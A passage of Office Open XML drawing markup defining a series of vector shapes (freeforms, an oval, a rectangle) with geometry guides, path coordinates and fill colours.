                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D469AB3-1F7D-41FA-984E-2DF4F1023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506"/>
                <a:ext cx="28" cy="17"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 28"/>
                  <a:gd name="T1" fmla="*/ 1 h 17"/>
                  <a:gd name="T2" fmla="*/ 1 w 28"/>
                  <a:gd name="T3" fmla="*/ 9 h 17"/>
                  <a:gd name="T4" fmla="*/ 0 w 28"/>
                  <a:gd name="T5" fmla="*/ 11 h 17"/>
                  <a:gd name="T6" fmla="*/ 6 w 28"/>
                  <a:gd name="T7" fmla="*/ 16 h 17"/>
                  <a:gd name="T8" fmla="*/ 14 w 28"/>
                  <a:gd name="T9" fmla="*/ 16 h 17"/>
                  <a:gd name="T10" fmla="*/ 23 w 28"/>
                  <a:gd name="T11" fmla="*/ 13 h 17"/>
                  <a:gd name="T12" fmla="*/ 27 w 28"/>
                  <a:gd name="T13" fmla="*/ 11 h 17"/>
                  <a:gd name="T14" fmla="*/ 25 w 28"/>
                  <a:gd name="T15" fmla="*/ 8 h 17"/>
                  <a:gd name="T16" fmla="*/ 24 w 28"/>
                  <a:gd name="T17" fmla="*/ 0 h 17"/>
                  <a:gd name="T18" fmla="*/ 0 w 28"/>
                  <a:gd name="T19" fmla="*/ 1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17"/>
                  <a:gd name="T32" fmla="*/ 28 w 28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17">
                    <a:moveTo>
                      <a:pt x="0" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24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4" name="Freeform 109">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FB2381F-8AFD-46E4-B1CB-36695CD09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2431"/>
                <a:ext cx="40" cy="85"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 35 w 40"/>
                  <a:gd name="T1" fmla="*/ 1 h 85"/>
                  <a:gd name="T2" fmla="*/ 38 w 40"/>
                  <a:gd name="T3" fmla="*/ 30 h 85"/>
                  <a:gd name="T4" fmla="*/ 37 w 40"/>
                  <a:gd name="T5" fmla="*/ 54 h 85"/>
                  <a:gd name="T6" fmla="*/ 39 w 40"/>
                  <a:gd name="T7" fmla="*/ 80 h 85"/>
                  <a:gd name="T8" fmla="*/ 20 w 40"/>
                  <a:gd name="T9" fmla="*/ 84 h 85"/>
                  <a:gd name="T10" fmla="*/ 1 w 40"/>
                  <a:gd name="T11" fmla="*/ 84 h 85"/>
                  <a:gd name="T12" fmla="*/ 0 w 40"/>
                  <a:gd name="T13" fmla="*/ 0 h 85"/>
                  <a:gd name="T14" fmla="*/ 35 w 40"/>
                  <a:gd name="T15" fmla="*/ 1 h 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85"/>
                  <a:gd name="T26" fmla="*/ 40 w 40"/>
                  <a:gd name="T27" fmla="*/ 85 h 8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85">
                    <a:moveTo>
                      <a:pt x="35" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="38" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3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5" name="Freeform 110">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71AEBB6F-74B9-4E7C-A198-B2264C6A1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" y="2434"/>
                <a:ext cx="30" cy="76"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 26 w 30"/>
                  <a:gd name="T1" fmla="*/ 2 h 76"/>
                  <a:gd name="T2" fmla="*/ 29 w 30"/>
                  <a:gd name="T3" fmla="*/ 25 h 76"/>
                  <a:gd name="T4" fmla="*/ 29 w 30"/>
                  <a:gd name="T5" fmla="*/ 42 h 76"/>
                  <a:gd name="T6" fmla="*/ 29 w 30"/>
                  <a:gd name="T7" fmla="*/ 70 h 76"/>
                  <a:gd name="T8" fmla="*/ 15 w 30"/>
                  <a:gd name="T9" fmla="*/ 75 h 76"/>
                  <a:gd name="T10" fmla="*/ 1 w 30"/>
                  <a:gd name="T11" fmla="*/ 75 h 76"/>
                  <a:gd name="T12" fmla="*/ 0 w 30"/>
                  <a:gd name="T13" fmla="*/ 0 h 76"/>
                  <a:gd name="T14" fmla="*/ 26 w 30"/>
                  <a:gd name="T15" fmla="*/ 2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"/>
                  <a:gd name="T25" fmla="*/ 0 h 76"/>
                  <a:gd name="T26" fmla="*/ 30 w 30"/>
                  <a:gd name="T27" fmla="*/ 76 h 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" h="76">
                    <a:moveTo>
                      <a:pt x="26" y="2"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="29" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="2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6" name="Freeform 111">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4FEF287-DC65-4E73-809D-701EE0B76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" y="2516"/>
                <a:ext cx="95" cy="42"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 55 w 95"/>
                  <a:gd name="T1" fmla="*/ 1 h 42"/>
                  <a:gd name="T2" fmla="*/ 56 w 95"/>
                  <a:gd name="T3" fmla="*/ 12 h 42"/>
                  <a:gd name="T4" fmla="*/ 31 w 95"/>
                  <a:gd name="T5" fmla="*/ 22 h 42"/>
                  <a:gd name="T6" fmla="*/ 11 w 95"/>
                  <a:gd name="T7" fmla="*/ 26 h 42"/>
                  <a:gd name="T8" fmla="*/ 0 w 95"/>
                  <a:gd name="T9" fmla="*/ 30 h 42"/>
                  <a:gd name="T10" fmla="*/ 0 w 95"/>
                  <a:gd name="T11" fmla="*/ 36 h 42"/>
                  <a:gd name="T12" fmla="*/ 16 w 95"/>
                  <a:gd name="T13" fmla="*/ 39 h 42"/>
                  <a:gd name="T14" fmla="*/ 38 w 95"/>
                  <a:gd name="T15" fmla="*/ 41 h 42"/>
                  <a:gd name="T16" fmla="*/ 56 w 95"/>
                  <a:gd name="T17" fmla="*/ 38 h 42"/>
                  <a:gd name="T18" fmla="*/ 67 w 95"/>
                  <a:gd name="T19" fmla="*/ 36 h 42"/>
                  <a:gd name="T20" fmla="*/ 68 w 95"/>
                  <a:gd name="T21" fmla="*/ 38 h 42"/>
                  <a:gd name="T22" fmla="*/ 83 w 95"/>
                  <a:gd name="T23" fmla="*/ 38 h 42"/>
                  <a:gd name="T24" fmla="*/ 93 w 95"/>
                  <a:gd name="T25" fmla="*/ 37 h 42"/>
                  <a:gd name="T26" fmla="*/ 93 w 95"/>
                  <a:gd name="T27" fmla="*/ 30 h 42"/>
                  <a:gd name="T28" fmla="*/ 94 w 95"/>
                  <a:gd name="T29" fmla="*/ 27 h 42"/>
                  <a:gd name="T30" fmla="*/ 94 w 95"/>
                  <a:gd name="T31" fmla="*/ 20 h 42"/>
                  <a:gd name="T32" fmla="*/ 90 w 95"/>
                  <a:gd name="T33" fmla="*/ 15 h 42"/>
                  <a:gd name="T34" fmla="*/ 86 w 95"/>
                  <a:gd name="T35" fmla="*/ 10 h 42"/>
                  <a:gd name="T36" fmla="*/ 85 w 95"/>
                  <a:gd name="T37" fmla="*/ 0 h 42"/>
                  <a:gd name="T38" fmla="*/ 55 w 95"/>
                  <a:gd name="T39" fmla="*/ 1 h 4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5"/>
                  <a:gd name="T61" fmla="*/ 0 h 42"/>
                  <a:gd name="T62" fmla="*/ 95 w 95"/>
                  <a:gd name="T63" fmla="*/ 42 h 4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5" h="42">
                    <a:moveTo>
                      <a:pt x="55" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="56" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="26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6" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85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7" name="Freeform 112">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{611425E0-4DC3-4430-A9EA-77DF3B225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1" y="2531"/>
                <a:ext cx="28" cy="17"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 20 w 28"/>
                  <a:gd name="T1" fmla="*/ 0 h 17"/>
                  <a:gd name="T2" fmla="*/ 27 w 28"/>
                  <a:gd name="T3" fmla="*/ 8 h 17"/>
                  <a:gd name="T4" fmla="*/ 3 w 28"/>
                  <a:gd name="T5" fmla="*/ 16 h 17"/>
                  <a:gd name="T6" fmla="*/ 0 w 28"/>
                  <a:gd name="T7" fmla="*/ 9 h 17"/>
                  <a:gd name="T8" fmla="*/ 20 w 2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17"/>
                  <a:gd name="T17" fmla="*/ 28 w 2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17">
                    <a:moveTo>
                      <a:pt x="20" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="27" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="9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8" name="Freeform 113">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9384FAE-16D1-4B9D-833A-576034A5A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" y="2540"/>
                <a:ext cx="30" cy="17"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 25 w 30"/>
                  <a:gd name="T1" fmla="*/ 0 h 17"/>
                  <a:gd name="T2" fmla="*/ 29 w 30"/>
                  <a:gd name="T3" fmla="*/ 6 h 17"/>
                  <a:gd name="T4" fmla="*/ 14 w 30"/>
                  <a:gd name="T5" fmla="*/ 13 h 17"/>
                  <a:gd name="T6" fmla="*/ 7 w 30"/>
                  <a:gd name="T7" fmla="*/ 16 h 17"/>
                  <a:gd name="T8" fmla="*/ 0 w 30"/>
                  <a:gd name="T9" fmla="*/ 13 h 17"/>
                  <a:gd name="T10" fmla="*/ 7 w 30"/>
                  <a:gd name="T11" fmla="*/ 6 h 17"/>
                  <a:gd name="T12" fmla="*/ 25 w 30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17"/>
                  <a:gd name="T23" fmla="*/ 30 w 30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17">
                    <a:moveTo>
                      <a:pt x="25" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="29" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="6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49" name="Freeform 114">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFCE0A61-8555-4A38-8768-7D271F036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" y="2531"/>
                <a:ext cx="89" cy="22"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 89"/>
                  <a:gd name="T1" fmla="*/ 18 h 22"/>
                  <a:gd name="T2" fmla="*/ 0 w 89"/>
                  <a:gd name="T3" fmla="*/ 14 h 22"/>
                  <a:gd name="T4" fmla="*/ 11 w 89"/>
                  <a:gd name="T5" fmla="*/ 15 h 22"/>
                  <a:gd name="T6" fmla="*/ 29 w 89"/>
                  <a:gd name="T7" fmla="*/ 13 h 22"/>
                  <a:gd name="T8" fmla="*/ 40 w 89"/>
                  <a:gd name="T9" fmla="*/ 11 h 22"/>
                  <a:gd name="T10" fmla="*/ 61 w 89"/>
                  <a:gd name="T11" fmla="*/ 6 h 22"/>
                  <a:gd name="T12" fmla="*/ 70 w 89"/>
                  <a:gd name="T13" fmla="*/ 5 h 22"/>
                  <a:gd name="T14" fmla="*/ 78 w 89"/>
                  <a:gd name="T15" fmla="*/ 3 h 22"/>
                  <a:gd name="T16" fmla="*/ 83 w 89"/>
                  <a:gd name="T17" fmla="*/ 0 h 22"/>
                  <a:gd name="T18" fmla="*/ 88 w 89"/>
                  <a:gd name="T19" fmla="*/ 4 h 22"/>
                  <a:gd name="T20" fmla="*/ 88 w 89"/>
                  <a:gd name="T21" fmla="*/ 13 h 22"/>
                  <a:gd name="T22" fmla="*/ 82 w 89"/>
                  <a:gd name="T23" fmla="*/ 14 h 22"/>
                  <a:gd name="T24" fmla="*/ 66 w 89"/>
                  <a:gd name="T25" fmla="*/ 16 h 22"/>
                  <a:gd name="T26" fmla="*/ 60 w 89"/>
                  <a:gd name="T27" fmla="*/ 17 h 22"/>
                  <a:gd name="T28" fmla="*/ 50 w 89"/>
                  <a:gd name="T29" fmla="*/ 19 h 22"/>
                  <a:gd name="T30" fmla="*/ 37 w 89"/>
                  <a:gd name="T31" fmla="*/ 21 h 22"/>
                  <a:gd name="T32" fmla="*/ 28 w 89"/>
                  <a:gd name="T33" fmla="*/ 21 h 22"/>
                  <a:gd name="T34" fmla="*/ 15 w 89"/>
                  <a:gd name="T35" fmla="*/ 21 h 22"/>
                  <a:gd name="T36" fmla="*/ 0 w 89"/>
                  <a:gd name="T37" fmla="*/ 18 h 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9"/>
                  <a:gd name="T58" fmla="*/ 0 h 22"/>
                  <a:gd name="T59" fmla="*/ 89 w 89"/>
                  <a:gd name="T60" fmla="*/ 22 h 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9" h="22">
                    <a:moveTo>
                      <a:pt x="0" y="18"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="21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0" name="Freeform 115">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7723C8B8-D3BC-4ADC-966F-A48CE5CFC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" y="2517"/>
                <a:ext cx="28" cy="18"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 28"/>
                  <a:gd name="T1" fmla="*/ 1 h 18"/>
                  <a:gd name="T2" fmla="*/ 1 w 28"/>
                  <a:gd name="T3" fmla="*/ 9 h 18"/>
                  <a:gd name="T4" fmla="*/ 0 w 28"/>
                  <a:gd name="T5" fmla="*/ 11 h 18"/>
                  <a:gd name="T6" fmla="*/ 6 w 28"/>
                  <a:gd name="T7" fmla="*/ 17 h 18"/>
                  <a:gd name="T8" fmla="*/ 14 w 28"/>
                  <a:gd name="T9" fmla="*/ 17 h 18"/>
                  <a:gd name="T10" fmla="*/ 23 w 28"/>
                  <a:gd name="T11" fmla="*/ 14 h 18"/>
                  <a:gd name="T12" fmla="*/ 27 w 28"/>
                  <a:gd name="T13" fmla="*/ 11 h 18"/>
                  <a:gd name="T14" fmla="*/ 24 w 28"/>
                  <a:gd name="T15" fmla="*/ 8 h 18"/>
                  <a:gd name="T16" fmla="*/ 24 w 28"/>
                  <a:gd name="T17" fmla="*/ 0 h 18"/>
                  <a:gd name="T18" fmla="*/ 0 w 28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18"/>
                  <a:gd name="T32" fmla="*/ 28 w 28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18">
                    <a:moveTo>
                      <a:pt x="0" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="11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1" name="Oval 116">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF5696EB-4401-4289-B74C-3DF2B2F6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2527"/>
                <a:ext cx="84" cy="14"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="60606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Rectangle 117">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE220F2B-FACA-4B94-BD0C-1E41C8962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2452"/>
                <a:ext cx="8" cy="61"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="60606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Freeform 118">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE81920D-6DC1-4054-BD9F-59C98F33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2409"/>
                <a:ext cx="148" cy="45"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 148"/>
                  <a:gd name="T1" fmla="*/ 23 h 45"/>
                  <a:gd name="T2" fmla="*/ 0 w 148"/>
                  <a:gd name="T3" fmla="*/ 36 h 45"/>
                  <a:gd name="T4" fmla="*/ 49 w 148"/>
                  <a:gd name="T5" fmla="*/ 44 h 45"/>
                  <a:gd name="T6" fmla="*/ 103 w 148"/>
                  <a:gd name="T7" fmla="*/ 44 h 45"/>
                  <a:gd name="T8" fmla="*/ 144 w 148"/>
                  <a:gd name="T9" fmla="*/ 32 h 45"/>
                  <a:gd name="T10" fmla="*/ 147 w 148"/>
                  <a:gd name="T11" fmla="*/ 1 h 45"/>
                  <a:gd name="T12" fmla="*/ 63 w 148"/>
                  <a:gd name="T13" fmla="*/ 0 h 45"/>
                  <a:gd name="T14" fmla="*/ 0 w 148"/>
                  <a:gd name="T15" fmla="*/ 23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8"/>
                  <a:gd name="T25" fmla="*/ 0 h 45"/>
                  <a:gd name="T26" fmla="*/ 148 w 148"/>
                  <a:gd name="T27" fmla="*/ 45 h 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8" h="45">
                    <a:moveTo>
                      <a:pt x="0" y="23"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6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4" name="Freeform 119">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E22C214F-4F9B-4109-9B2D-A9BF66643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2426"/>
                <a:ext cx="137" cy="23"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 137"/>
                  <a:gd name="T1" fmla="*/ 7 h 23"/>
                  <a:gd name="T2" fmla="*/ 0 w 137"/>
                  <a:gd name="T3" fmla="*/ 16 h 23"/>
                  <a:gd name="T4" fmla="*/ 42 w 137"/>
                  <a:gd name="T5" fmla="*/ 22 h 23"/>
                  <a:gd name="T6" fmla="*/ 97 w 137"/>
                  <a:gd name="T7" fmla="*/ 22 h 23"/>
                  <a:gd name="T8" fmla="*/ 136 w 137"/>
                  <a:gd name="T9" fmla="*/ 11 h 23"/>
                  <a:gd name="T10" fmla="*/ 136 w 137"/>
                  <a:gd name="T11" fmla="*/ 0 h 23"/>
                  <a:gd name="T12" fmla="*/ 100 w 137"/>
                  <a:gd name="T13" fmla="*/ 11 h 23"/>
                  <a:gd name="T14" fmla="*/ 43 w 137"/>
                  <a:gd name="T15" fmla="*/ 11 h 23"/>
                  <a:gd name="T16" fmla="*/ 0 w 137"/>
                  <a:gd name="T17" fmla="*/ 7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"/>
                  <a:gd name="T28" fmla="*/ 0 h 23"/>
                  <a:gd name="T29" fmla="*/ 137 w 137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" h="23">
                    <a:moveTo>
                      <a:pt x="0" y="7"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="11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5" name="Freeform 120">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D68F59F-71DE-4BAA-AEF3-09FBE435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363"/>
                <a:ext cx="202" cy="162"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 202"/>
                  <a:gd name="T1" fmla="*/ 90 h 162"/>
                  <a:gd name="T2" fmla="*/ 1 w 202"/>
                  <a:gd name="T3" fmla="*/ 75 h 162"/>
                  <a:gd name="T4" fmla="*/ 1 w 202"/>
                  <a:gd name="T5" fmla="*/ 57 h 162"/>
                  <a:gd name="T6" fmla="*/ 2 w 202"/>
                  <a:gd name="T7" fmla="*/ 43 h 162"/>
                  <a:gd name="T8" fmla="*/ 10 w 202"/>
                  <a:gd name="T9" fmla="*/ 36 h 162"/>
                  <a:gd name="T10" fmla="*/ 21 w 202"/>
                  <a:gd name="T11" fmla="*/ 31 h 162"/>
                  <a:gd name="T12" fmla="*/ 45 w 202"/>
                  <a:gd name="T13" fmla="*/ 24 h 162"/>
                  <a:gd name="T14" fmla="*/ 80 w 202"/>
                  <a:gd name="T15" fmla="*/ 17 h 162"/>
                  <a:gd name="T16" fmla="*/ 87 w 202"/>
                  <a:gd name="T17" fmla="*/ 16 h 162"/>
                  <a:gd name="T18" fmla="*/ 92 w 202"/>
                  <a:gd name="T19" fmla="*/ 17 h 162"/>
                  <a:gd name="T20" fmla="*/ 93 w 202"/>
                  <a:gd name="T21" fmla="*/ 15 h 162"/>
                  <a:gd name="T22" fmla="*/ 95 w 202"/>
                  <a:gd name="T23" fmla="*/ 13 h 162"/>
                  <a:gd name="T24" fmla="*/ 97 w 202"/>
                  <a:gd name="T25" fmla="*/ 14 h 162"/>
                  <a:gd name="T26" fmla="*/ 100 w 202"/>
                  <a:gd name="T27" fmla="*/ 14 h 162"/>
                  <a:gd name="T28" fmla="*/ 101 w 202"/>
                  <a:gd name="T29" fmla="*/ 11 h 162"/>
                  <a:gd name="T30" fmla="*/ 104 w 202"/>
                  <a:gd name="T31" fmla="*/ 9 h 162"/>
                  <a:gd name="T32" fmla="*/ 107 w 202"/>
                  <a:gd name="T33" fmla="*/ 9 h 162"/>
                  <a:gd name="T34" fmla="*/ 110 w 202"/>
                  <a:gd name="T35" fmla="*/ 9 h 162"/>
                  <a:gd name="T36" fmla="*/ 110 w 202"/>
                  <a:gd name="T37" fmla="*/ 6 h 162"/>
                  <a:gd name="T38" fmla="*/ 114 w 202"/>
                  <a:gd name="T39" fmla="*/ 0 h 162"/>
                  <a:gd name="T40" fmla="*/ 196 w 202"/>
                  <a:gd name="T41" fmla="*/ 1 h 162"/>
                  <a:gd name="T42" fmla="*/ 196 w 202"/>
                  <a:gd name="T43" fmla="*/ 8 h 162"/>
                  <a:gd name="T44" fmla="*/ 197 w 202"/>
                  <a:gd name="T45" fmla="*/ 15 h 162"/>
                  <a:gd name="T46" fmla="*/ 198 w 202"/>
                  <a:gd name="T47" fmla="*/ 19 h 162"/>
                  <a:gd name="T48" fmla="*/ 200 w 202"/>
                  <a:gd name="T49" fmla="*/ 26 h 162"/>
                  <a:gd name="T50" fmla="*/ 201 w 202"/>
                  <a:gd name="T51" fmla="*/ 35 h 162"/>
                  <a:gd name="T52" fmla="*/ 200 w 202"/>
                  <a:gd name="T53" fmla="*/ 40 h 162"/>
                  <a:gd name="T54" fmla="*/ 197 w 202"/>
                  <a:gd name="T55" fmla="*/ 45 h 162"/>
                  <a:gd name="T56" fmla="*/ 195 w 202"/>
                  <a:gd name="T57" fmla="*/ 50 h 162"/>
                  <a:gd name="T58" fmla="*/ 191 w 202"/>
                  <a:gd name="T59" fmla="*/ 52 h 162"/>
                  <a:gd name="T60" fmla="*/ 185 w 202"/>
                  <a:gd name="T61" fmla="*/ 52 h 162"/>
                  <a:gd name="T62" fmla="*/ 176 w 202"/>
                  <a:gd name="T63" fmla="*/ 55 h 162"/>
                  <a:gd name="T64" fmla="*/ 174 w 202"/>
                  <a:gd name="T65" fmla="*/ 59 h 162"/>
                  <a:gd name="T66" fmla="*/ 169 w 202"/>
                  <a:gd name="T67" fmla="*/ 62 h 162"/>
                  <a:gd name="T68" fmla="*/ 162 w 202"/>
                  <a:gd name="T69" fmla="*/ 64 h 162"/>
                  <a:gd name="T70" fmla="*/ 154 w 202"/>
                  <a:gd name="T71" fmla="*/ 66 h 162"/>
                  <a:gd name="T72" fmla="*/ 141 w 202"/>
                  <a:gd name="T73" fmla="*/ 67 h 162"/>
                  <a:gd name="T74" fmla="*/ 131 w 202"/>
                  <a:gd name="T75" fmla="*/ 67 h 162"/>
                  <a:gd name="T76" fmla="*/ 123 w 202"/>
                  <a:gd name="T77" fmla="*/ 67 h 162"/>
                  <a:gd name="T78" fmla="*/ 116 w 202"/>
                  <a:gd name="T79" fmla="*/ 66 h 162"/>
